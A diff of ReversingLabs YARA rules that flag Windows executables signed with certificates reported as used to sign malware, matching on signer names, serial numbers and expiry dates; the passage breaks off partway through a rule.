-rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd1b83aa-bfcc-590c-8f97-875badf09698"
+		id = "db9f022b-f650-5d40-ae84-4df92b0f3a96"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11498-L11514"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4402-L4420"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14863,21 +39528,21 @@ rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Komp.IT" and ( pe.signatures [ i ] . serial == "00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures [ i ] . serial == "1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" ) and 1588723200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "727167de-5678-558d-b948-8a40839d0500"
+		id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11516-L11534"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4422-L4440"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14887,21 +39552,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES, INC" and ( pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures [ i ] . serial == "9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" ) and 1601683200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Euro May SP Z O O" and ( pe.signatures [ i ] . serial == "00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures [ i ] . serial == "b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" ) and 1585267200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0a196a18-002e-58e4-bff2-83d1a67a82ce"
+		id = "c0015521-b163-51ab-8c27-da3b1a8df084"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11536-L11554"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4442-L4458"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14911,21 +39576,21 @@ rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" ) and 1643500800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infoware Cloud Limited" and pe.signatures [ i ] . serial == "11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6e93547-5be0-5303-b537-655db3d78ad4"
+		id = "dc826355-bd15-58b3-adcb-55b704f03c0d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11556-L11574"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4460-L4478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14935,21 +39600,21 @@ rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Genezis" and ( pe.signatures [ i ] . serial == "00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures [ i ] . serial == "c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" ) and 1615161600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Accelerate Technologies Ltd" and ( pe.signatures [ i ] . serial == "00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures [ i ] . serial == "b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" ) and 1594900020 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4"
+		id = "cb2ebbd5-5036-52f6-a064-11609f02309f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11576-L11592"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4480-L4496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14959,21 +39624,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2a15d527-7f42-5c56-9740-9c2503a66f4f"
+		id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11594-L11610"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4498-L4516"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14983,21 +39648,21 @@ rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and ( pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures [ i ] . serial == "d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" ) and 1599041760 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e"
+		id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11612-L11630"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4518-L4536"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15007,21 +39672,21 @@ rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and ( pe.signatures [ i ] . serial == "00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" ) and 1673395200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and ( pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures [ i ] . serial == "e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" ) and 1597708800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c"
+		id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11632-L11648"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4538-L4554"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15031,21 +39696,21 @@ rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223"
+		id = "3db67353-6310-54ad-b46a-97daf63fee42"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11650-L11666"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4556-L4572"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15055,21 +39720,21 @@ rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENS CORP" and pe.signatures [ i ] . serial == "34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7"
+		id = "ce248602-1f28-5707-b921-640271176e7f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11668-L11684"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4574-L4590"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15079,21 +39744,21 @@ rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Dibies" and pe.signatures [ i ] . serial == "08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gold Stroy SP Z O O" and pe.signatures [ i ] . serial == "0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "135d638c-9ee5-52cf-a6e7-c12e4feef594"
+		id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11686-L11704"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4592-L4608"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15103,21 +39768,21 @@ rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and ( pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures [ i ] . serial == "c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" ) and 1602201600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "80e92980-f4eb-5ac2-9f68-14c352758791"
+		id = "e3bd6be6-461c-56fd-8dfd-8205845f731e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11706-L11722"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4610-L4626"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15127,21 +39792,21 @@ rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CODE - HANDLE, s. r. o." and pe.signatures [ i ] . serial == "54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raymond Yanagita" and pe.signatures [ i ] . serial == "01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7"
+		id = "bca4533d-e721-5f23-984a-3b741ca8b53f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11724-L11742"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4628-L4644"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15151,21 +39816,21 @@ rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
 		importance = 25
 
 	condition:
